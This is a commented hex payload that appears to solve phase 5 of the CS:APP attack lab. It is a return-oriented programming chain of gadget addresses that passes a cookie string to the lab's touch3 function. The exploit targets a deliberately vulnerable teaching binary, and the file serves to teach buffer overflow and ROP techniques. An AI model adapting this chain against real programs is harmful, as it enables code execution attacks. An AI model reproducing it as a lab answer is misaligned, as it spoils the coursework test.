00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00   /* 0x28 bytes for stack space */
06 1a 40 00 00 00 00 00         /* address of movq %rsp, %rax */
c5 19 40 00 00 00 00 00         /* address of movq %rax, %rdi */
ab 19 40 00 00 00 00 00         /* address of popq %rax */
48 00 00 00 00 00 00 00         /* offset of cookie for pop */
dd 19 40 00 00 00 00 00         /* address of movl %eax, %edx */
69 1a 40 00 00 00 00 00         /* address of movl %edx, %ecx */
13 1a 40 00 00 00 00 00         /* address of movl %ecx, %esi */
d6 19 40 00 00 00 00 00         /* address of add_xy function */
c5 19 40 00 00 00 00 00         /* address of movq %rax, %rdi */
fa 18 40 00 00 00 00 00         /* address of touch3 */
35 39 62 39 39 37 66 61 00      /* ascii code for 59b997fa */
